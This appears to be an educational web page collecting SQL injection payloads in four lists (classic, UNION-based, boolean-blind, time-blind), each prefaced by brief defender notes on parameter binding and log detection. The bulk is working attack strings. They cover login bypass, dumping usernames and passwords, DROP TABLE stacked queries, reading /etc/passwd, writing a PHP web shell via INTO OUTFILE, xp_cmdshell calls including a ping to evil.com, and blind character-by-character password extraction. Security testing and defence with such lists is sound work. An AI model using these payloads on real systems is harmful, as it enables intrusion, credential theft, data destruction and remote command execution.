Exemples d'Injections SQL

Collection éducative de payloads d'injection SQL pour les tests de sécurité, l'évaluation des vulnérabilités et les pratiques de codage défensif

📝 Motifs d'Injection SQL Classiques sql

🟢 simple ⭐⭐

Techniques fondamentales d'injection SQL - contournement d'authentification, OR 1=1, UNION SELECT, injections basées sur les commentaires et énumération de bases de données

⏱️ 20 min 🏷️ sql, injection, database, security, bypass
# Classic SQL Injection Patterns
# Fundamental SQL injection techniques that form the basis for most attacks
#
# Defender notes for this list:
# - Every entry depends on the input being spliced into a quoted SQL literal (the leading ' or ",
#   or %27 once URL-decoded) and on a comment marker (--, #, /*) discarding the rest of the statement.
#   Binding the value as a query parameter keeps the quote inside the literal, so none of these
#   strings ever reach the parser as SQL; escaping by hand is the fragile alternative, not the fix.
# - Detection: the recurring tokens below (UNION SELECT, information_schema, ORDER BY <n>,
#   SLEEP(, WAITFOR DELAY, pg_sleep(, xp_cmdshell, DROP TABLE) are the strings worth alerting on
#   in request and query logs; the cookie/header variants at the end show why logging should
#   cover every header that ends up in a query, not just URL parameters.
# - The "stacked queries" entries only work where the driver allows several statements per call;
#   which engines/drivers that applies to is not stated on this page — confirm per target.

# Authentication bypass with OR 1=1
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 'a'='a
" OR "a"="a
admin' OR '1'='1'--
admin" OR "1"="1"--
'or'1'='1
"or"1"="1

# Tautology-based injections (always true conditions)
' OR 1=1#
' OR 1=1--
' OR 1=1/*
" OR 1=1#
" OR 1=1--
' OR '1'='1'#
" OR "1"="1"#
admin' OR '1'='1'#
admin" OR "1"="1"#

# Comment-based injections to bypass remaining query
' OR 1=1--
' OR 1=1#
' OR 1=1/*
" OR 1=1--
" OR 1=1#
" OR 1=1/*
' OR '1'='1'--
" OR "1"="1"--

# Union select for data extraction
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
" UNION SELECT NULL#
" UNION SELECT NULL, NULL#
" UNION SELECT NULL, NULL, NULL#

# Admin bypass with specific username
admin'--
admin'#
admin'/*
admin"--
admin"#
admin"/*

# Boolean-based testing
' AND 1=1--
' AND 1=2--
' AND '1'='1
" AND "1"="1
' AND 'a'='a
" AND "a"="a

# Order by enumeration (column counting)
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--

# Error-based injection attempts
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--

# Time-based injection basics
' WAITFOR DELAY '00:00:05'--
' AND SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
' OR pg_sleep(5)--

# Stacked queries (multiple statements)
'; DROP TABLE users--
'; DROP TABLE users#
' ; DROP TABLE users --
'; DELETE FROM users WHERE '1'='1
'; INSERT INTO users (username, password) VALUES ('hacker', 'pwned')--

# Database version extraction
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT @@version, NULL, NULL--
' UNION SELECT version(), NULL, NULL, NULL--

# Table name enumeration
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT table_name, table_type FROM information_schema.tables--
' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database()--

# Column name enumeration
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT column_name, data_type FROM information_schema.columns--
' UNION SELECT column_name, NULL, NULL FROM information_schema.columns WHERE table_name='users'--

# Data extraction from users table
' UNION SELECT username, password FROM users--
' UNION SELECT username, password, email FROM users--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT NULL, NULL, username, password FROM users--

# Bypassing login with comment truncation
admin'--
admin'#
admin'/*' OR '1'='1
admin'/*' OR '1'='1'--

# MySQL specific injections
' OR 1=1#
' OR 1=1--
' OR '1'='1'#
" OR "1"="1"#
' UNION SELECT database()#
' UNION SELECT user()#
' UNION SELECT @@version#

# SQL Server specific injections
' OR 1=1--
' UNION SELECT @@version--
' UNION SELECT db_name()--
' UNION SELECT system_user--
'; EXEC xp_cmdshell('dir')--

# Oracle specific injections
' OR '1'='1'--
' UNION SELECT banner FROM v$version--
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--

# PostgreSQL specific injections
' OR 1=1--
' UNION SELECT version()--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns--
' OR pg_sleep(5)--

# SQLite specific injections
' OR '1'='1'--
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--

# Access control bypass
' OR '1'='1' LIMIT 1--
' OR '1'='1' OR '1'='2--
admin' OR '1'='1'--
' OR user_id='admin'--

# Second-order injection (stored in database)
admin'; INSERT INTO logs (message) VALUES ('Hacked');--
admin'; DROP TABLE logs;--

# Blind SQL injection tests
' AND 1=1 AND '1'='1
' AND 1=2 AND '1'='1
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64

# Logic testing
' AND 1=1#
' AND 1=2#
' AND 1=1--
' AND 1=2--
' OR 1=1#
' OR 1=2#

# Encoding bypass attempts
%27%20OR%20%271%27%3D%271
%27%20UNION%20SELECT%20NULL--
\%27\%20OR\%20\%271\%27=\%27\%27

# HTTP parameter pollution
id=1' OR '1'='1&id=2
username=admin&username=' OR '1'='1

# Cookie-based injection
Cookie: sessionid=' OR '1'='1
Cookie: user_id=' UNION SELECT NULL--

# User-Agent injection
User-Agent: ' OR '1'='1
User-Agent: ' UNION SELECT @@version--

# Referer injection
Referer: ' OR '1'='1
Referer: ' UNION SELECT user()--

# X-Forwarded-For injection
X-Forwarded-For: ' OR '1'='1
X-Forwarded-For: ' UNION SELECT database()--

📝 Injections SQL Basées sur UNION sql

🟡 intermediate ⭐⭐⭐

Injection SQL avancée utilisant UNION SELECT pour extraire des données d'autres tables - énumération de colonnes, prise d'empreinte de base de données et extraction de données

⏱️ 25 min 🏷️ sql, union, injection, database, extraction
# UNION-based SQL Injection Vectors
# Advanced SQL injection using UNION SELECT to extract data from other tables
#
# Defender notes for this list:
# - A UNION only succeeds when the injected SELECT matches the original query's column count and
#   types; that is what the NULL-padding and ORDER BY 1..10 entries probe for. The probing itself is
#   a clear log signature: bursts of requests identical except for one incrementing number.
# - Parameterized queries stop every entry here at the source. Where that is not possible, a
#   database account with SELECT on only the application's own tables (no information_schema /
#   mysql.user / sys.* / pg_user reads beyond what the app needs) limits what a successful UNION
#   can return.
# - The LOAD_FILE / INTO OUTFILE entries need the MySQL FILE privilege and a writable path
#   (secure_file_priv restricts it); the xp_cmdshell entries need that procedure enabled, which is
#   a server-level setting. Neither should be available to a web application's login.

# Basic UNION syntax
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
" UNION SELECT NULL#
" UNION SELECT NULL, NULL#
" UNION SELECT NULL, NULL, NULL#

# Column enumeration with ORDER BY
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--

# Database fingerprinting
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT @@version, NULL--
' UNION SELECT version(), NULL, NULL--
' UNION SELECT @@version, NULL, NULL, NULL--

# Database name extraction
' UNION SELECT database()#
' UNION SELECT db_name()--
' UNION SELECT database(), NULL--
' UNION SELECT database(), NULL, NULL--
' UNION SELECT db_name(), NULL, NULL--

# Current user extraction
' UNION SELECT user()#
' UNION SELECT system_user--
' UNION SELECT current_user--
' UNION SELECT user(), NULL--
' UNION SELECT system_user, NULL--

# Table enumeration
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT table_name, NULL FROM information_schema.tables--
' UNION SELECT table_name, table_type FROM information_schema.tables--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--

# Column enumeration
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT column_name, data_type FROM information_schema.columns--
' UNION SELECT column_name, NULL, NULL FROM information_schema.columns--
' UNION SELECT column_name, data_type, character_maximum_length FROM information_schema.columns--

# Column enumeration for specific table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users' AND table_schema=database()--

# Data extraction from users table
' UNION SELECT username, password FROM users--
' UNION SELECT username, password, email FROM users--
' UNION SELECT username, password, NULL FROM users--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT username, password FROM users WHERE '1'='1--

# Data extraction with specific conditions
' UNION SELECT username, password FROM users WHERE username='admin'--
' UNION SELECT username, password FROM users WHERE id=1--
' UNION SELECT username, password FROM users WHERE user_id='admin'--
' UNION SELECT * FROM users--

# Multiple UNION operations
' UNION SELECT NULL, NULL UNION SELECT NULL, NULL--
' UNION SELECT username FROM users UNION SELECT password FROM users--
' UNION SELECT username FROM users UNION SELECT email FROM users UNION SELECT password FROM users--

# UNION with database functions
' UNION SELECT @@version, database(), user()--
' UNION SELECT version(), current_database(), current_user--
' UNION SELECT @@version, db_name(), system_user--
' UNION SELECT version(), database(), user(), NULL--

# UNION with string functions
' UNION SELECT concat(username, ':', password) FROM users--
' UNION SELECT concat_ws(':', username, password) FROM users--
' UNION SELECT username || ':' || password FROM users--
' UNION SELECT group_concat(username) FROM users--

# UNION with aggregate functions
' UNION SELECT COUNT(*) FROM users--
' UNION SELECT MAX(id), MIN(id) FROM users--
' UNION SELECT SUM(amount), AVG(amount) FROM transactions--
' UNION SELECT COUNT(DISTINCT username) FROM users--

# UNION with conditional logic
' UNION SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END--
' UNION SELECT CASE WHEN username='admin' THEN password ELSE NULL END FROM users--
' UNION SELECT IF(1=1, 'true', 'false')--
' UNION SELECT IIF(1=1, 'true', 'false')--

# UNION with subqueries
' UNION SELECT (SELECT password FROM users WHERE username='admin')--
' UNION SELECT (SELECT COUNT(*) FROM information_schema.tables)--
' UNION SELECT (SELECT table_name FROM information_schema.tables LIMIT 1)--

# UNION ALL to include duplicates
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL, NULL--
' UNION ALL SELECT username, password FROM users--
' UNION ALL SELECT username FROM users UNION ALL SELECT password FROM users--

# UNION DISTINCT to remove duplicates
' UNION DISTINCT SELECT username FROM users--
' UNION DISTINCT SELECT password FROM users--
' UNION DISTINCT SELECT email FROM users--

# MySQL specific UNION injections
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()#
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'#
' UNION SELECT concat(user, ':', password) FROM mysql.user#
' UNION SELECT grantee, privilege_type FROM information_schema.user_privileges#

# SQL Server specific UNION injections
' UNION SELECT name FROM sys.tables--
' UNION SELECT name FROM sys.columns WHERE object_id=OBJECT_ID('users')--
' UNION SELECT name, type_desc FROM sys.tables--
' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'--

# Oracle specific UNION injections
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
' UNION SELECT banner FROM v$version--
' UNION SELECT owner, table_name FROM all_tables--

# PostgreSQL specific UNION injections
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT datname FROM pg_database--
' UNION SELECT usename FROM pg_user--

# SQLite specific UNION injections
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--
' UNION SELECT tbl_name FROM sqlite_master WHERE type='table'--
' UNION SELECT sql FROM sqlite_master WHERE type='index'--

# UNION with time delays
' UNION SELECT SLEEP(5)--
' UNION SELECT pg_sleep(5)--
' UNION SELECT WAITFOR DELAY '00:00:05'--
' UNION SELECT BENCHMARK(5000000, MD5(1))--

# UNION with file operations (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
' UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'--

# UNION with system commands (SQL Server)
' UNION SELECT NULL, NULL, NULL, EXEC xp_cmdshell('dir')--
' UNION SELECT NULL, NULL, NULL, EXEC master..xp_cmdshell 'ping evil.com'--

# Advanced data extraction techniques
' UNION SELECT group_concat(concat(username, ':', password)) FROM users--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 2--

# UNION with JOIN operations
' UNION SELECT u.username, u.password, r.role_name FROM users u JOIN roles r ON u.role_id = r.id--
' UNION SELECT t1.column1, t2.column2 FROM table1 t1 JOIN table2 t2 ON t1.id = t2.id--

# Error-based UNION injections
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--

# Blind UNION injections
' AND (SELECT COUNT(*) FROM information_schema.tables) > 5--
' AND (SELECT LENGTH((SELECT password FROM users WHERE username='admin'))) > 5--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64--
' AND (SELECT SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) = 'a'--

📝 Injections SQL Aveugles Basées sur des Booléens sql

🟡 intermediate ⭐⭐⭐

Injection SQL aveugle exploitant des conditions vraies/fausses - énumération de bases de données, extraction de données via la logique booléenne et tests conditionnels

⏱️ 30 min 🏷️ sql, blind, boolean, injection, database
# Boolean-based Blind SQL Injection Vectors
# SQL injection techniques that exploit true/false conditions without returning data
#
# Defender notes for this list:
# - Nothing here needs the query to echo data back: the attacker only observes whether the page
#   behaves as for a true or a false condition. Suppressing error messages therefore does not help;
#   parameter binding (so the ' never closes the literal) is still the fix.
# - Because each ASCII(SUBSTRING(...)) / LENGTH(...) entry yields at most one bit or one character,
#   a real extraction is hundreds of near-identical requests that differ only in a position index
#   or a compared number. Rate limiting and alerting on that request shape is the practical
#   detection; so is any information_schema / mysql.user / sqlite_master reference in app queries.
# - Several entries read privilege tables (mysql.user, information_schema.user_privileges); the
#   application's database login should not be granted SELECT on those.

# Basic boolean testing
' AND 1=1--
' AND 1=2--
' AND '1'='1
" AND "1"="1
' AND 'a'='a
" AND "a"="a

# Tautology-based boolean injections
' OR 1=1--
' OR '1'='1
" OR 1=1--
" OR "1"="1
admin' OR '1'='1'--
admin" OR "1"="1"--

# Contradiction-based boolean injections
' AND 1=2--
' AND '1'='2
" AND 1=2--
" AND "1"="2
admin' AND '1'='2'--

# Subquery boolean testing
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 5--
' AND (SELECT COUNT(*) FROM information_schema.columns) > 10--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') = 1--

# Database name length checking
' AND LENGTH((SELECT database())) > 0--
' AND LENGTH((SELECT database())) > 5--
' AND LENGTH((SELECT database())) = 8--
' AND LENGTH((SELECT database())) < 10--

# Database name character by character extraction
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 96--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) = 115--
' AND ASCII(SUBSTRING((SELECT database()),2,1)) > 64--
' AND ASCII(SUBSTRING((SELECT database()),2,1)) = 101--

# Table name existence checking
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') = 1--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name LIKE 'user%') > 0--

# Table name length checking
' AND LENGTH((SELECT table_name FROM information_schema.tables LIMIT 1)) > 0--
' AND LENGTH((SELECT table_name FROM information_schema.tables LIMIT 1)) = 5--
' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_name='users')) = 5--

# Column name existence checking
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE column_name='password') > 0--
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE column_name='username') > 0--
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' AND column_name='password') = 1--

# Data existence checking
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND password='password123') > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') = 1--

# Password length checking
' AND LENGTH((SELECT password FROM users WHERE username='admin')) > 0--
' AND LENGTH((SELECT password FROM users WHERE username='admin')) = 32--
' AND LENGTH((SELECT password FROM users WHERE username='admin')) < 64--

# Password character by character extraction
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 64--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) = 97--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1)) > 64--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1)) = 98--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a'--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1) = 'b'--

# Version checking
' AND (SELECT LENGTH(VERSION())) = 23--
' AND ASCII(SUBSTRING(VERSION(),1,1)) > 48--
' AND ASCII(SUBSTRING(VERSION(),1,1)) = 53--
' AND SUBSTRING(VERSION(),1,1) = '5'--

# User checking
' AND (SELECT COUNT(*) FROM information_schema.users WHERE username='admin') > 0--
' AND (SELECT USER()) = 'root@localhost'--
' AND (SELECT CURRENT_USER()) = 'admin'@'%'--

# Privilege checking
' AND (SELECT COUNT(*) FROM information_schema.user_privileges WHERE grantee LIKE '%admin%') > 0--
' AND (SELECT super_priv FROM mysql.user WHERE user='root') = 'Y'--
' AND (SELECT is_role_enabled('admin')) = 1--

# File existence checking
' AND (SELECT COUNT(*) FROM information_schema.files WHERE file_name='/etc/passwd')) > 0--
' AND (SELECT file_exists('/etc/passwd')) = 1--

# Conditional error-based boolean
' AND (SELECT 1 FROM information_schema.tables) = 1--
' AND (SELECT 1 FROM users WHERE username='admin') = 1--
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--

# Time-based boolean variations
' AND SLEEP(5)--
' AND pg_sleep(5)--
' AND WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000, MD5(1))--

# Case sensitivity testing
' AND BINARY('admin') = 'admin'--
' AND BINARY('ADMIN') = 'admin'--
' AND BINARY((SELECT username FROM users WHERE id=1)) = 'admin'--

# NULL testing
' AND (SELECT password FROM users WHERE username='admin') IS NULL--
' AND (SELECT COUNT(*) FROM users WHERE password IS NULL) > 0--
' AND (SELECT email FROM users WHERE username='admin') IS NOT NULL--

# Range-based boolean testing
' AND (SELECT COUNT(*) FROM users) BETWEEN 1 AND 100--
' AND (SELECT COUNT(*) FROM users) >= 10--
' AND (SELECT COUNT(*) FROM users) <= 1000--
' AND (SELECT id FROM users WHERE username='admin') BETWEEN 1 AND 100--

# Pattern matching boolean
' AND (SELECT username FROM users WHERE id=1) LIKE 'admin%'--
' AND (SELECT password FROM users WHERE username='admin') LIKE '%123%'--
' AND (SELECT email FROM users WHERE username='admin') LIKE '%@example.com'--
' AND (SELECT database()) LIKE 'test%'--

# String comparison boolean
' AND (SELECT database()) = 'testdb'--
' AND (SELECT username FROM users WHERE id=1) = 'admin'--
' AND (SELECT password FROM users WHERE username='admin') = 'password123'--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1) = 'users'--

# Numeric comparison boolean
' AND (SELECT COUNT(*) FROM users) > 10--
' AND (SELECT id FROM users WHERE username='admin') = 1--
' AND (SELECT LENGTH(password) FROM users WHERE username='admin') = 32--
' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM users WHERE username='admin') = 97--

# Boolean logic combinations
' AND 1=1 AND 2=2--
' AND 1=1 AND 2=3--
' AND (1=1 OR 2=2) AND 3=3--
' AND ((1=1) OR (2=2)) AND (3=3 OR 4=4)--

# Nested boolean conditions
' AND ((SELECT COUNT(*) FROM users) > 0 AND (SELECT COUNT(*) FROM admins) > 0)--
' AND ((SELECT database()) = 'testdb' OR (SELECT database()) = 'devdb')--
' AND (LENGTH((SELECT password FROM users WHERE username='admin')) > 0 AND LENGTH((SELECT password FROM users WHERE username='admin')) < 64)--

# Boolean with GROUP BY
' AND (SELECT COUNT(*) FROM (SELECT username FROM users GROUP BY username) AS temp) > 0--
' AND (SELECT COUNT(DISTINCT username) FROM users) > 10--

# Boolean with HAVING
' AND (SELECT COUNT(*) FROM users GROUP BY username HAVING COUNT(*) > 1) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables GROUP BY table_schema HAVING COUNT(*) > 5) > 0--

# Boolean with ORDER BY
' AND (SELECT username FROM users ORDER BY username LIMIT 1) = 'admin'--
' AND (SELECT table_name FROM information_schema.tables ORDER BY table_name LIMIT 1) = 'accounts'--

# Boolean with LIMIT and OFFSET
' AND (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0) = 'users'--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1) = 'accounts'--
' AND (SELECT username FROM users LIMIT 1 OFFSET 0) = 'admin'--

# Database-specific boolean injections
# MySQL
' AND (SELECT @@version) = '5.7.25'--
' AND (SELECT database()) = 'testdb'--
' AND (SELECT user()) = 'root@localhost'--

# SQL Server
' AND (SELECT @@version) LIKE '%SQL Server%'--
' AND (SELECT db_name()) = 'testdb'--
' AND (SELECT system_user) = 'dbo'--

# Oracle
' AND (SELECT banner FROM v$version WHERE ROWNUM=1) LIKE '%Oracle%'--
' AND (SELECT user FROM dual) = 'ADMIN'--
' AND (SELECT table_name FROM all_tables WHERE ROWNUM=1) = 'USERS'--

# PostgreSQL
' AND (SELECT version()) LIKE '%PostgreSQL%'--
' AND (SELECT current_database()) = 'testdb'--
' AND (SELECT current_user) = 'postgres'--

# SQLite
' AND (SELECT sql FROM sqlite_master WHERE type='table' LIMIT 1) LIKE '%users%'--
' AND (SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) = 'users'--

📝 Injections SQL Aveugles Basées sur le Temps sql

🔴 complex ⭐⭐⭐⭐

Injection SQL utilisant le temps de réponse de la base de données - SLEEP(), WAITFOR DELAY, BENCHMARK() et techniques d'extraction de données basées sur le temps

⏱️ 35 min 🏷️ sql, blind, time-based, injection, database
# Time-based Blind SQL Injection Vectors
# SQL injection techniques that use database response time to extract data
#
# Defender notes for this list:
# - The delay functions used here (SLEEP, BENCHMARK, pg_sleep, WAITFOR DELAY, DBMS_PIPE /
#   DBMS_LOCK, and the CROSS JOIN "heavy query" fallbacks) are ordinary built-ins, so they cannot
#   simply be revoked; parameter binding remains the fix. A per-statement execution timeout on the
#   application's connections bounds the delay an attacker can induce and limits the resource cost
#   of the BENCHMARK / CROSS JOIN variants, but does not by itself remove the timing signal.
# - Detection: the IF(...,5,0) / CASE ... THEN 5 ELSE 0 entries produce response times that cluster
#   at two values for one parameter; alerting on repeated slow requests sharing a parameter, and on
#   SLEEP( / pg_sleep( / WAITFOR DELAY / BENCHMARK( in query logs, catches them early.
# - The header-based entries near the end (Cookie, User-Agent, Referer, X-Forwarded-For) only matter
#   if those values reach a query; if they do, they need the same binding as form parameters.

# Basic time-based injections
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
' OR pg_sleep(5)--
'; SELECT SLEEP(5)--
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--

# MySQL time-based injections
' AND SLEEP(5)--
' OR SLEEP(10)--
' AND BENCHMARK(5000000, MD5(1))--
' AND BENCHMARK(50000000, MD5(1))--
' OR BENCHMARK(5000000, SHA1(1))--
' AND SLEEP(5) AND '1'='1
' AND SLEEP(10) AND 'a'='a
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
'; SELECT SLEEP(5)--

# SQL Server time-based injections
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '00:00:10'--
'; WAITFOR DELAY '0:0:10'--
' AND WAITFOR DELAY '00:00:05'--
' OR WAITFOR DELAY '00:00:05'--
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
' OR DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--

# PostgreSQL time-based injections
' OR pg_sleep(5)--
' AND pg_sleep(10)--
'; SELECT pg_sleep(5)--
' OR pg_sleep(10)--
' AND pg_sleep(5) AND '1'='1--
' OR pg_sleep(5) AND 'a'='a--

# Oracle time-based injections
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
' OR DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
' AND DBMS_LOCK.SLEEP(5)--
' OR DBMS_LOCK.SLEEP(10)--
'; EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--

# SQLite time-based injections (using heavy queries)
' AND (SELECT COUNT(*) FROM (SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master))--
' AND (SELECT COUNT(*) FROM (SELECT * FROM sqlite_master CROSS JOIN sqlite_master CROSS JOIN sqlite_master))--
' AND (SELECT COUNT(*) FROM (SELECT * FROM users CROSS JOIN users CROSS JOIN users CROSS JOIN users CROSS JOIN users))--

# Database name extraction with time delays
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT database()),1,1))>64,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT current_database()),1,1))>64 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN ASCII(SUBSTRING((SELECT db_name()),1,1))>64 THEN '00:00:05' ELSE '00:00:00' END--

# Table name extraction with time delays
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0 THEN '00:00:05' ELSE '00:00:00' END--

# Data extraction with time delays
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64 THEN '00:00:05' ELSE '00:00:00' END--

# Character by character extraction with time
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT database()),1,1))=115 THEN 5 ELSE 0 END)--
' AND BENCHMARK(5000000, MD5(IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,'true','false')))--

# Conditional time-based queries
' AND SLEEP(IF((SELECT COUNT(*) FROM users)>0,5,0))--
' AND SLEEP(IF((SELECT database())='testdb',5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)>5 THEN 5 ELSE 0 END)--
' AND WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN '00:00:05' ELSE '00:00:00' END--

# Heavy query time delays for databases without sleep functions
' AND (SELECT COUNT(*) FROM (SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users) AS temp) > 0--
' AND (SELECT COUNT(*) FROM (SELECT * FROM information_schema.tables a CROSS JOIN information_schema.tables b CROSS JOIN information_schema.tables c) AS temp) > 0--

# Multiple time delays for confirmation
' AND SLEEP(5) AND SLEEP(5)--
' AND pg_sleep(5) AND pg_sleep(5)--
' WAITFOR DELAY '00:00:05' WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000, MD5(1)) AND BENCHMARK(5000000, MD5(1))--

# Variable time delays for bit extraction
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 128)=128,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 64)=64,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 32)=32,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 16)=16,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 8)=8,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 4)=4,5,0))--
